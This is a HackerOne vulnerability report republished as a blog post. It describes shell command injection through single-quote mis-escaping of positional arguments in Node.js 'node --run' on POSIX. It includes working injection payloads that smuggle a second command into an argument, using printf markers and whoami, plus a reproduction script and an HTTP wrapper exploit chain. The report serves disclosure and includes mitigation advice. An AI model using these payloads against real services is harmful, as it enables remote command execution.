{“lastseen”:”2026-06-23T10:36:58″,”description”:”# \\n\\n## Summary\\n\\nNode.js `node –run \\u003cscript\\u003e — \\u003cargs\\u003e` attempts to append positional arguments to a package script after escaping each argument for the shell.\\n\\nOn POSIX platforms, the escaping logic handles single quotes incorrectly. A positional argument containing a single quote can break out of the intended quoted argument and inject additional shell syntax.\\n\\nThe attacker does not need to control `package.json` or the selected script. The demonstrated payload only controls one argument after `–`.\\n\\n## Affected Versions\\n\\nConfirmed vulnerable on Linux x64:\\n\\n| Version | Result |\\n| — | — |\\n| v22.23.0 | Vulnerable |\\n| v24.17.0 | Vulnerable |\\n| v26.3.1 | Vulnerable |\\n\\n`–run` was added in v22.0.0, so older versions that do not implement `–run` are not affected by this specific issue.\\n\\nWindows was not tested.\\n\\n## Attack Scenario\\n\\nA service, CI bot, build wrapper, or developer tool invokes a trusted package script through Node’s built-in task runner and forwards a user-controlled value as a positional argument:\\n\\n“`sh\\nnode –run test — \\”$user_controlled_pattern\\”\\n“`\\n\\nThe application expects the value after `–` to be delivered to the package script as data, such as a test name, filename, glob, branch name, or filter string.\\n\\nAn attacker supplies a value containing a single quote and shell metacharacters. Node’s task runner incorrectly escapes the argument, causing the shell to execute attacker-controlled syntax as the user running `node –run`.\\n\\n## Exploit Chain Scenario\\n\\nThe included exploit-chain PoC models a realistic wrapper that does not use a shell at the application boundary.\\n\\nThe wrapper exposes an HTTP endpoint that receives a user-controlled query value and invokes Node with an argv array:\\n\\n“`js\\nspawn(process.execPath, [‘–run’, ‘search’, ‘–‘, userInput], {\\n shell: false\\n});\\n“`\\n\\nThe trusted package script is only:\\n\\n“`json\\n{\\n \\”scripts\\”: {\\n \\”search\\”: \\”node helper.js\\”\\n }\\n}\\n“`\\n\\nA safe request forwards `safe filter value` to `helper.js` and does not create the marker file.\\n\\nAn attack request forwards:\\n\\n“`text\\nSAFE_ARG’; printf \\”chain-owned\\” \\u003e \\”$CHAIN_MARKER\\”; #\\n“`\\n\\nEven though the wrapper used `shell: false`, Node’s internal `–run` implementation converts the single argv element into shell syntax, truncates the helper argument to `SAFE_ARG\\\\`, and executes the injected `printf` redirection.\\n\\n## Why This Is Not Just Application Misuse\\n\\nPackage scripts themselves are shell commands, but Node exposes a separate documented boundary for arguments after `–`.\\n\\nThe Node.js CLI documentation says that arguments after `–` are appended to the script:\\n\\nhttps:\/\/github.com\/nodejs\/node\/blob\/2e190332d098124605962520182f3f279419149d\/doc\/api\/cli.md#L2632-L2675\\n\\nNode’s implementation also explicitly treats these values as positional arguments that need escaping before being appended:\\n\\nhttps:\/\/github.com\/nodejs\/node\/blob\/2e190332d098124605962520182f3f279419149d\/src\/node_task_runner.cc#L54-L79\\n\\nThe vulnerability is that Node’s own escaping function does not preserve the argument boundary for single quotes on POSIX. The caller may have correctly passed a single literal argv element to `node –run`, but Node converts that argv element into shell syntax.\\n\\n## Root Cause Code Evidence\\n\\n`ProcessRunner` appends positional arguments by concatenating `EscapeShell(arg)` into a command string that is later passed to the shell with `-c`:\\n\\nhttps:\/\/github.com\/nodejs\/node\/blob\/2e190332d098124605962520182f3f279419149d\/src\/node_task_runner.cc#L54-L79\\n\\nThe POSIX branch of `EscapeShell()` wraps the argument in single quotes, but replaces embedded single quotes with `\\\\’`:\\n\\nhttps:\/\/github.com\/nodejs\/node\/blob\/2e190332d098124605962520182f3f279419149d\/src\/node_task_runner.cc#L173-L182\\n\\nIn POSIX shell syntax, a single quote cannot be escaped with backslash while inside single quotes. The resulting command string allows an embedded single quote to close the quoted argument.\\n\\nCurrent tests cover spaces and double quotes in positional arguments, but not single quotes:\\n\\nhttps:\/\/github.com\/nodejs\/node\/blob\/2e190332d098124605962520182f3f279419149d\/test\/parallel\/test-node-run.js#L143-L157\\n\\n## Proof of Concept\\n\\nThe PoC creates a temporary package with a harmless script:\\n\\n“`json\\n{\\n \\”scripts\\”: {\\n \\”show\\”: \\”printf \\\\\\”received:%s\\\\\\\\n\\\\\\”\\”\\n }\\n}\\n“`\\n\\nIt then invokes:\\n\\n“`sh\\nnode –run show — \\”SAFE_ARG’; printf \\\\\\”command-injection\\\\\\” \\u003e \\\\\\”$NODE_RUN_POC_MARKER\\\\\\”; #\\”\\n“`\\n\\nExpected safe behavior:\\n\\nThe complete payload is passed as one literal positional argument and no marker file is created.\\n\\nActual behavior:\\n\\nThe shell executes the injected `printf` redirection and creates the marker file.\\n\\n## Command Execution Proof\\n\\nA second PoC uses the same bug to execute `whoami`:\\n\\n“`text\\nSAFE_ARG’; whoami \\u003e \\”$NODE_RUN_COMMAND_OUTPUT\\”; #\\n“`\\n\\nOutput from v26.3.1:\\n\\n“`json\\n{\\n \\”nodeVersion\\”: \\”v26.3.1\\”,\\n \\”platform\\”: \\”linux\\”,\\n \\”arch\\”: \\”x64\\”,\\n \\”proof\\”: \\”whoami command execution through node –run positional argument shell injection\\”,\\n \\”vulnerable\\”: true,\\n \\”payload\\”: \\”SAFE_ARG’; whoami \\u003e \\\\\\”$NODE_RUN_COMMAND_OUTPUT\\\\\\”; #\\”,\\n \\”command\\”: \\”whoami\\”,\\n \\”commandOutput\\”: \\”root\\”,\\n \\”commandOutputCreated\\”: true,\\n \\”childExitCode\\”: 0,\\n \\”stdout\\”: \\”received:SAFE_ARG\\\\\\\\\\\\n\\”,\\n \\”stderr\\”: \\”\\”\\n}\\n“`\\n\\nThis shows arbitrary shell command execution as the operating-system user running the Node.js process. In a remotely reachable wrapper or CI service that forwards attacker-controlled input to `node –run … –`, this becomes remote command execution in that service context.\\n\\n## Relevant Output\\n\\nFrom v26.3.1:\\n\\n“`json\\n{\\n \\”nodeVersion\\”: \\”v26.3.1\\”,\\n \\”platform\\”: \\”linux\\”,\\n \\”arch\\”: \\”x64\\”,\\n \\”feature\\”: \\”node –run positional argument forwarding\\”,\\n \\”vulnerable\\”: true,\\n \\”markerCreated\\”: true,\\n \\”markerContent\\”: \\”command-injection\\”,\\n \\”childExitCode\\”: 0,\\n \\”stdout\\”: \\”received:SAFE_ARG\\\\\\\\\\\\n\\”,\\n \\”stderr\\”: \\”\\”,\\n \\”payload\\”: \\”SAFE_ARG’; printf \\\\\\”command-injection\\\\\\” \\u003e \\\\\\”$NODE_RUN_POC_MARKER\\\\\\”; #\\”\\n}\\n“`\\n\\nRaw outputs are included as attachments:\\n\\n* `node-v22.23.0-output.json`\\n* `node-v24.17.0-output.json`\\n* `node-v26.3.1-output.json`\\n* `node-v26.3.1-whoami-output.json`\\n* `node-v22.23.0-http-wrapper-chain-output.json`\\n* `node-v24.17.0-http-wrapper-chain-output.json`\\n* `node-v26.3.1-http-wrapper-chain-output.json`\\n\\nExploit-chain output from v26.3.1:\\n\\n“`json\\n{\\n \\”nodeVersion\\”: \\”v26.3.1\\”,\\n \\”exploitChain\\”: \\”remote HTTP input -\\u003e safe argv spawn wrapper -\\u003e node –run positional argument -\\u003e shell command injection\\”,\\n \\”vulnerable\\”: true,\\n \\”safeRequest\\”: {\\n \\”markerCreated\\”: false,\\n \\”helperObserved\\”: {\\n \\”argv\\”: [\\n \\”safe filter value\\”\\n ]\\n }\\n },\\n \\”attackRequest\\”: {\\n \\”markerCreated\\”: true,\\n \\”markerContent\\”: \\”chain-owned\\”,\\n \\”helperObserved\\”: {\\n \\”argv\\”: [\\n \\”SAFE_ARG\\\\\\\\\\”\\n ]\\n },\\n \\”childExitCode\\”: 0,\\n \\”stderr\\”: \\”\\”\\n }\\n}\\n“`\\n\\n## Manual Reproduction\\n\\nRun on a POSIX system with an affected Node.js version:\\n\\n“`sh\\nWORKDIR=\\”$(mktemp -d)\\”\\ncd \\”$WORKDIR\\”\\n\\ncat \\u003e package.json \\u003c\\u003c’JSON’\\n{\\”scripts\\”:{\\”show\\”:\\”printf \\\\\\”received:%s\\\\\\\\n\\\\\\”\\”}}\\nJSON\\n\\nexport NODE_RUN_POC_MARKER=\\”$WORKDIR\/command-executed.txt\\”\\nPAYLOAD=\\”SAFE_ARG’; printf \\\\\\”command-injection\\\\\\” \\u003e \\\\\\”\\\\$NODE_RUN_POC_MARKER\\\\\\”; #\\”\\n\\nnode –run show — \\”$PAYLOAD\\”\\ncat \\”$NODE_RUN_POC_MARKER\\”\\n“`\\n\\nVulnerable output:\\n\\n“`text\\nreceived:SAFE_ARG\\\\\\ncommand-injection\\n“`\\n\\nThe second line is printed by `cat` reading the marker file created by injected shell syntax.\\n\\n## Mitigation \/ Workaround\\n\\nApplications should avoid forwarding untrusted values to `node –run` until this is fixed.\\n\\nIf forwarding untrusted values is required, avoid `node –run` and invoke a trusted executable directly with an argv array through `child_process.spawn()` or equivalent APIs that do not concatenate arguments into a shell command string.\\n\\n## Patch Direction\\n\\nThe upstream fix should ensure that positional arguments after `–` cannot alter shell syntax when appended to the package script.\\n\\nPossible directions include using a correct POSIX single-quote escaping strategy, or changing the invocation model so positional arguments are passed as shell positional parameters rather than concatenated into the script string.\\n\\nThe final upstream fix may choose a different implementation.\\n\\n## Impact\\n\\n## \\n\\nThis is command injection in the `node –run` positional argument forwarding boundary on POSIX.\\n\\nThis is especially security-relevant because the application boundary may use child_process.spawn() with an argv array and shell: false; the shell interpretation is introduced later by Node’s internal –run task runner.\\n\\nImpact depends on the privileges of the process invoking Node. In CI, build automation, internal web tooling, or wrapper services, this can become remote code execution as the account running the job.\\n\\nThe strongest impact occurs when the attacker can influence an argument after `–` but cannot otherwise control the package script or the shell command being executed.”,”published”:”2026-06-22T15:21:24″,”modified”:”2026-06-23T09:53:21″,”type”:”hackerone”,”title”:”Node.js: Node –run POSIX positional argument escaping allows shell command injection”,”source”:””,”references”:””,”id”:”H1:3817602″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3817602″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-23T10:36:58″,”description”:”# \\n\\n## Summary\\n\\nNode.js `node –run \\u003cscript\\u003e — \\u003cargs\\u003e` attempts to append positional arguments to a package script after escaping each argument for the shell.\\n\\nOn POSIX…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-64997","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n